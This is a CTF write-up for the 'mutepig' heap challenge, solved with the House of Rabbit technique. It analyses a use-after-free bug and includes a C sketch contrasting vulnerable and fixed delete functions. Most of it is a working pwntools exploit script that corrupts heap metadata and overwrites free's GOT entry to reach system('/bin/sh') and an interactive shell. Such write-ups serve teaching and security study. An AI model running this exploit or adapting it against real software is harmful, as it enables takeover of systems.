Introduction
This challenge seems to be the first appearance of House of Rabbit in a CTF competition. It follows the sample code given in [1]. More details on House of Rabbit are given in my previous post, House-of-Rabbit.
Vulnerability Analysis
There is a classic use-after-free vulnerability in the delete function: an entry is not removed from the list after it is freed, so it can still be selected by the modify and delete operations.
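The fix for this bug, as an added example: a hypothetical reconstruction of the entry table (this is not the challenge's real source, and the table layout, sizes and function names are assumptions), showing the vulnerable delete beside a hardened version that clears the slot after free and makes the other operations reject freed entries.

```c
#include <stdlib.h>
#include <string.h>

#define MAX_ENTRIES 16

/* Hypothetical reconstruction (assumption, not the challenge's real source):
 * the binary keeps a table of heap chunks indexed by the user's choice. */
struct entry { char *buf; size_t size; };
static struct entry table_vuln[MAX_ENTRIES];
static struct entry table_fixed[MAX_ENTRIES];

static int live(struct entry *t, int idx) {
    return idx >= 0 && idx < MAX_ENTRIES && t[idx].buf != NULL;
}

int create(struct entry *t, int idx, size_t size) {
    if (idx < 0 || idx >= MAX_ENTRIES || t[idx].buf != NULL) return -1;
    t[idx].buf = calloc(1, size);
    t[idx].size = size;
    return t[idx].buf ? 0 : -1;
}

/* Vulnerable pattern from the writeup: the chunk is freed but the pointer
 * stays in the list, so later modify()/delete() calls touch freed memory. */
int delete_vuln(int idx) {
    if (!live(table_vuln, idx)) return -1;
    free(table_vuln[idx].buf);
    return 0;                          /* dangling pointer left behind */
}

/* Hardened version: clear the slot after free, so every later operation
 * treats the entry as absent instead of reusing the freed chunk. */
int delete_fixed(int idx) {
    if (!live(table_fixed, idx)) return -1;
    free(table_fixed[idx].buf);
    table_fixed[idx].buf = NULL;
    table_fixed[idx].size = 0;
    return 0;
}

/* Bounded write that refuses both freed entries and oversized input. */
int modify_fixed(int idx, const char *data, size_t len) {
    if (!live(table_fixed, idx) || len > table_fixed[idx].size) return -1;
    memcpy(table_fixed[idx].buf, data, len);
    return 0;
}

/* Exposed for checking: does the slot still reference a chunk? */
int slot_has_pointer(struct entry *t, int idx) { return live(t, idx); }
```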
Exploit Plan
Since there is no output function at all, we cannot leak any addresses. Instead, we use House of Rabbit to overwrite the function pointer of free@plt with 0x4006e0 and finally trigger system("/bin/sh").
Exploit
from pwn import *
import time

DEBUG = int(sys.argv[1])
if DEBUG == 0:
    r = remote("1.2.3.4", 2333)
elif DEBUG == 1:
    r = process("./mutepig")
elif DEBUG == 2:
    r = process("./mutepig")
    gdb.attach(r, '''source ./script''')

# size option:
#   1: fast (0x10)
#   2: small (0x80)
#   3: large (0xa00000)
#   13337: magic
#   else: negative

def create(sizeoption, payload):
    time.sleep(0.2)
    r.sendline("1")
    r.sendline(str(sizeoption))
    r.send(payload.ljust(7, '\x00'))

def delete(index):
    time.sleep(0.2)
    r.sendline("2")
    r.sendline(str(index))

def modify(index, payload1, payload2):
    time.sleep(0.2)
    r.sendline("3")
    r.sendline(str(index))
    r.send(payload1.ljust(0x7, '\x00'))
    r.send(payload2)

def exploit():
    create(3, "A"*4)  # 0
    delete(0)
    create(3, "B"*4)  # 1
    delete(1)
    create(1, "C"*4)  # 2
    create(2, "D"*4)  # 3
    delete(2)
    # use-after-free: entries 2 and 3 are still reachable after delete
    modify(2, p32(0x602130), p64(0) + p64(0x11) + p64(0) + p64(0xfffffffffffffff1))
    delete(3)
    modify(3, "E"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xa00001))
    create(3, "F"*4)
    modify(3, "G"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xfffffffffffffff1))
    create(13337, "/bin/sh")
    create(1, p32(0x602018))  # 0
    # overwrite the function pointer of free@plt with 0x4006e0
    modify(0, p32(0x4006e0), p64(0))
    modify(6, "/bin/sh", p64(0))
    # free("/bin/sh") now ends up in system("/bin/sh")
    delete(6)
    r.interactive()

exploit()
Reference
[1] http://shift-crops.hatenablog.com/entry/2017/09/16/001126